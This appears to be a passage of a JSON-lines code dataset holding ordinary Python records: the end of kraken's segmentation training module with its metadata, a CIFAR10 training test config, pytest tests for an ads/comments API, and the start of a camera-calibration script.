pred = pred.squeeze() > 0.3\n pred = pred.view(pred.size(0), -1)\n y = y.view(y.size(0), -1)\n\n return {'intersections': (y & pred).sum(dim=1, dtype=torch.double),\n 'unions': (y | pred).sum(dim=1, dtype=torch.double),\n 'corrects': torch.eq(y, pred).sum(dim=1, dtype=torch.double),\n 'cls_cnt': y.sum(dim=1, dtype=torch.double),\n 'all_n': torch.tensor(y.size(1), dtype=torch.double, device=self.device)}\n\n def validation_epoch_end(self, outputs):\n smooth = torch.finfo(torch.float).eps\n\n intersections = torch.stack([x['intersections'] for x in outputs]).sum()\n unions = torch.stack([x['unions'] for x in outputs]).sum()\n corrects = torch.stack([x['corrects'] for x in outputs]).sum()\n cls_cnt = torch.stack([x['cls_cnt'] for x in outputs]).sum()\n all_n = torch.stack([x['all_n'] for x in outputs]).sum()\n\n # all_positives = tp + fp\n # actual_positives = tp + fn\n # true_positivies = tp\n pixel_accuracy = corrects.sum() / all_n.sum()\n mean_accuracy = torch.mean(corrects / all_n)\n iu = (intersections + smooth) / (unions + smooth)\n mean_iu = torch.mean(iu)\n freq_iu = torch.sum(cls_cnt / cls_cnt.sum() * iu)\n\n if mean_iu > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {mean_iu} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n self.best_metric = mean_iu\n\n logger.info(f'validation run: accuracy {pixel_accuracy} mean_acc {mean_accuracy} mean_iu {mean_iu} freq_iu {freq_iu}')\n self.log_dict({'val_accuracy': pixel_accuracy,\n 'val_mean_acc': mean_accuracy,\n 'val_mean_iu': mean_iu,\n 'val_freq_iu': freq_iu,\n 'val_metric': mean_iu}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if not self.model:\n self.spec = f'[{self.spec[1:-1]} O2l{self.train_set.dataset.num_classes}]'\n logger.info(f'Creating model {self.spec} with {self.train_set.dataset.num_classes} outputs ', nl=False)\n nn = vgsl.TorchVGSLModel(self.spec)\n if self.bounding_regions is not None:\n nn.user_metadata['bounding_regions'] = self.bounding_regions\n nn.user_metadata['topline'] = self.topline\n self.nn = nn\n else:\n if self.train_set.dataset.class_mapping['baselines'].keys() != self.nn.user_metadata['class_mapping']['baselines'].keys() or \\\n self.train_set.dataset.class_mapping['regions'].keys() != self.nn.user_metadata['class_mapping']['regions'].keys():\n\n bl_diff = set(self.train_set.dataset.class_mapping['baselines'].keys()).symmetric_difference(\n set(self.nn.user_metadata['class_mapping']['baselines'].keys()))\n regions_diff = set(self.train_set.dataset.class_mapping['regions'].keys()).symmetric_difference(\n set(self.nn.user_metadata['class_mapping']['regions'].keys()))\n\n if self.resize == 'fail':\n raise ValueError(f'Training data and model class mapping differ (bl: {bl_diff}, regions: {regions_diff}')\n elif self.resize == 'add':\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing types to network output layer.')\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) + 1)\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n elif self.resize == 'both':\n logger.info('Fitting network exactly to training set.')\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n del_bls = self.nn.user_metadata['class_mapping']['baselines'].keys() - self.train_set.dataset.class_mapping['baselines'].keys()\n del_regions = self.nn.user_metadata['class_mapping']['regions'].keys() - self.train_set.dataset.class_mapping['regions'].keys()\n\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing '\n f'types and removing {len(del_bls) + len(del_regions)} to network output layer ')\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n\n del_indices = [self.nn.user_metadata['class_mapping']['baselines'][x] for x in del_bls]\n del_indices.extend(self.nn.user_metadata['class_mapping']['regions'][x] for x in del_regions)\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) -\n len(del_bls) - len(del_regions) + 1, del_indices)\n\n # delete old baseline/region types\n cls_idx = min(min(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else np.inf,\n min(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else np.inf)\n\n bls = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['baselines'].items(), key=lambda item: item[1]):\n if k not in del_bls:\n bls[k] = cls_idx\n cls_idx += 1\n\n regions = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['regions'].items(), key=lambda item: item[1]):\n if k not in del_regions:\n regions[k] = cls_idx\n cls_idx += 1\n\n self.nn.user_metadata['class_mapping']['baselines'] = bls\n self.nn.user_metadata['class_mapping']['regions'] = regions\n\n # add new baseline/region types\n cls_idx -= 1\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n # backfill train_set/val_set mapping if key-equal as the actual\n # numbering in the train_set might be different\n self.train_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n self.val_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n\n # updates model's hyper params with user-defined ones\n self.nn.hyper_params = self.hparams\n\n # change topline/baseline switch\n loc = {None: 'centerline',\n True: 'topline',\n False: 'baseline'}\n\n if 'topline' not in self.nn.user_metadata:\n logger.warning(f'Setting baseline location to {loc[self.topline]} from unset model.')\n elif self.nn.user_metadata['topline'] != self.topline:\n from_loc = loc[self.nn.user_metadata['topline']]\n logger.warning(f'Changing baseline location from {from_loc} to {loc[self.topline]}.')\n self.nn.user_metadata['topline'] = self.topline\n\n logger.info('Training line types:')\n for k, v in self.train_set.dataset.class_mapping['baselines'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"baselines\"][k]}')\n logger.info('Training region types:')\n for k, v in self.train_set.dataset.class_mapping['regions'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"regions\"][k]}')\n\n if len(self.train_set) == 0:\n raise ValueError('No valid training data was provided to the train command. Please add valid XML data.')\n\n # set model type metadata field and dump class_mapping\n self.nn.model_type = 'segmentation'\n self.nn.user_metadata['class_mapping'] = self.val_set.dataset.class_mapping\n\n # for model size/trainable parameter output\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=1,\n num_workers=self.num_workers,\n shuffle=True,\n pin_memory=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=1,\n num_workers=self.num_workers,\n pin_memory=True)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_mean_iu',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\ndef _configure_optimizer_and_lr_scheduler(hparams, params, len_train_set=None, loss_tracking_mode='max'):\n # XXX: Warmup is not configured here because it needs to be manually done in optimizer_step()\n logger.debug(f'Constructing {hparams.optimizer} optimizer (lr: {hparams.lrate}, momentum: {hparams.momentum})')\n if hparams.optimizer == 'Adam':\n optim = torch.optim.Adam(params, lr=hparams.lrate, weight_decay=hparams.weight_decay)\n else:\n optim = getattr(torch.optim, hparams.optimizer)(params,\n lr=hparams.lrate,\n momentum=hparams.momentum,\n weight_decay=hparams.weight_decay)\n lr_sched = {}\n if hparams.schedule == 'exponential':\n lr_sched = {'scheduler': lr_scheduler.ExponentialLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'cosine':\n lr_sched = {'scheduler': lr_scheduler.CosineAnnealingLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'step':\n lr_sched = {'scheduler': lr_scheduler.StepLR(optim, hparams.step_size, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'reduceonplateau':\n lr_sched = {'scheduler': lr_scheduler.ReduceLROnPlateau(optim,\n mode=loss_tracking_mode,\n factor=hparams.rop_factor,\n patience=hparams.rop_patience),\n 'interval': 'step'}\n elif hparams.schedule == '1cycle':\n if hparams.epochs <= 0:\n raise ValueError('1cycle learning rate scheduler selected but '\n 'number of epochs is less than 0 '\n f'({hparams.epochs}).')\n last_epoch = hparams.completed_epochs*len_train_set if hparams.completed_epochs else -1\n lr_sched = {'scheduler': lr_scheduler.OneCycleLR(optim,\n max_lr=hparams.lrate,\n epochs=hparams.epochs,\n steps_per_epoch=len_train_set,\n last_epoch=last_epoch),\n 'interval': 'step'}\n elif hparams.schedule != 'constant':\n raise ValueError(f'Unsupported learning rate scheduler {hparams.schedule}.')\n\n if lr_sched:\n lr_sched['monitor'] = 'val_metric'\n\n return [optim], lr_sched if lr_sched else []\n", "sub_path": "kraken/lib/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 50671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 47, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 55, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 66, "usage_type": "name"}, {"api_name": "kraken.lib.progress.KrakenTrainProgressBar", "line_number": 81, "usage_type": "call"}, {"api_name": "kraken.lib.progress", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.RichModelSummary", "line_number": 86, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 94, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 95, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 100, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 116, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 131, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 137, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 140, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_SPEC", "line_number": 135, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 135, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS", "line_number": 166, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 166, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 169, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 169, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 169, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.GroundTruthDataset", "line_number": 197, "usage_type": "name"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 201, "usage_type": "call"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 204, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 208, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.ArrowIPCRecognitionDataset", "line_number": 211, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 238, "usage_type": "name"}, {"api_name": "re.match", "line_number": 260, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Subset", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 302, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 321, "usage_type": "call"}, {"api_name": "kraken.lib.codec.PytorchCodec", "line_number": 328, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Pool", "line_number": 351, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 352, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 360, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 386, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.compute_error", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.finfo", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 404, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 412, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenEncodeException", "line_number": 433, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 441, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 477, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 477, "usage_type": "name"}, {"api_name": "kraken.lib.models.TorchSeqRecognizer", "line_number": 498, "usage_type": "call"}, {"api_name": "kraken.lib.models", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.set_num_threads", "line_number": 501, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 504, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 509, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 512, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 517, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 522, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 556, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 563, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 565, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 567, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 568, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 571, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 571, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 572, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 573, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 573, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 586, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_SPEC", "line_number": 570, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 570, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS", "line_number": 616, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 616, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 620, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 620, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 620, "usage_type": "name"}, {"api_name": "re.match", "line_number": 639, "usage_type": "call"}, {"api_name": "kraken.lib.models.validate_hyper_parameters", "line_number": 647, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 653, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 655, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 661, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 663, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 663, "usage_type": "attribute"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 677, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 707, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 714, "usage_type": "call"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 735, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 735, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 743, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 743, "usage_type": "name"}, {"api_name": "torch.double", "line_number": 748, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 749, "usage_type": "attribute"}, {"api_name": "torch.eq", "line_number": 750, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 750, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 751, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 752, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 752, "usage_type": "attribute"}, {"api_name": "torch.finfo", "line_number": 755, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 755, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 758, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 759, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 760, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 761, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 767, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 769, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 770, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 784, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 790, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 790, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 837, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 838, "usage_type": "attribute"}, {"api_name": "torch.set_num_threads", "line_number": 902, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 905, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 912, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 921, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 956, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 956, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 967, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 969, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ExponentialLR", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 975, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 978, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 978, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 981, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 981, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 984, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 984, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 995, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 995, "usage_type": "name"}]} +{"seq_id": "270541196", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 128\nIMG_SIZE = 224\nNUM_CLS = 1000\n\n# resnet 18\nmodel = dict(\n type='VanillaResNet',\n block_type='ResNetBottleneck',\n layers=[3, 4, 6, 3],\n num_cls=NUM_CLS\n)\n\ntrain_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n transform_pipeline=[\n dict(type='RandomResizedCrop', size=IMG_SIZE),\n dict(type='RandomHorizontalFlip'),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n sampler=dict(\n type='DataParallelSampler',\n shuffle=True,\n )\n )\n)\n\ntest_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n train=False,\n transform_pipeline=[\n dict(type='Resize', size=(IMG_SIZE, IMG_SIZE)),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=BATCH_SIZE,\n pin_memory=True,\n num_workers=4,\n )\n)\n\ndist_initializer = [\n dict(type='DataParallelInitializer'),\n]\n\nparallelization = dict(\n pipeline=1,\n tensor=1,\n sequence=-1\n)\n\noptimizer = dict(\n type='Adam',\n lr=0.01\n)\n\nloss = dict(\n type='CrossEntropyLoss'\n)\n\ntrainer = dict(\n max_epochs=5,\n max_iters=1000\n)\n\namp = dict(\n fp16=None,\n)\n\nlevel = 2\n\nparallel = dict(\n pipeline=dict(size=1),\n tensor=dict(size=1, mode=None)\n)\n", "sub_path": "tests/test_zero_data_parallel/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "113244271", "text": "__author__ = 'jkf'\n\nimport json\n\nfrom adengine.model import User, Ad, Comment\n\n\ndef build_api_url(id_=None):\n if id_ is not None:\n return \"/api/ads/{}\".format(id_)\n return \"/api/ads\"\n\n\ndef _add_resource(session, resource):\n session.add(resource)\n session.commit()\n return resource\n\n\ndef _new_ad(user, text=\"ad-text\"):\n ad = Ad(text=text, author_id=user.id)\n return ad\n\n\ndef _new_user(name='Peter'):\n user = User(email='{name}@example.com'.format(name=name),\n name=name,\n username=name,\n password_hash='12346')\n return user\n\n\ndef _new_comment(ad, user, text='bla-bla-bla'):\n comment = Comment(text=text,\n ad_id=ad.id,\n author_id=user.id)\n return comment\n\n\ndef test_comments_refers_both_ad_and_user(session, client):\n \"Ensure comments added are referneced from the Ad\"\n # given\n user = _add_resource(session, _new_user(name='PeterGeneralUser'))\n user1 = _add_resource(session, _new_user(name='PeterGeneralUserGrant'))\n ad = _add_resource(session, _new_ad(user, text=\"ad1-text1\"))\n _add_resource(session, _new_comment(ad, user, text=\"ad11-text1\"))\n _add_resource(session, _new_comment(ad, user1, text=\"ad12-text1\"))\n\n # exercise\n result = client.get(build_api_url()).data\n doc = json.loads(result)\n\n # verify\n ads_dicts = doc.get(\"objects\")\n assert 1 == len(ads_dicts), \"Expected only one advertisement.\"\n assert \"ad1-text1\" == ads_dicts[0].get('text')\n", "sub_path": "tests/views/test_ads.py", "file_name": "test_ads.py", "file_ext": "py", "file_size_in_byte": 1519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "adengine.model.Ad", "line_number": 21, "usage_type": "call"}, {"api_name": "adengine.model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "adengine.model.Comment", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "45264770", "text": "import pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef camera_calibrate(cal_images, nx=9, ny=6):\n '''\n camera_calibrate finds camera calibration parameters\n :param cal_images:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n 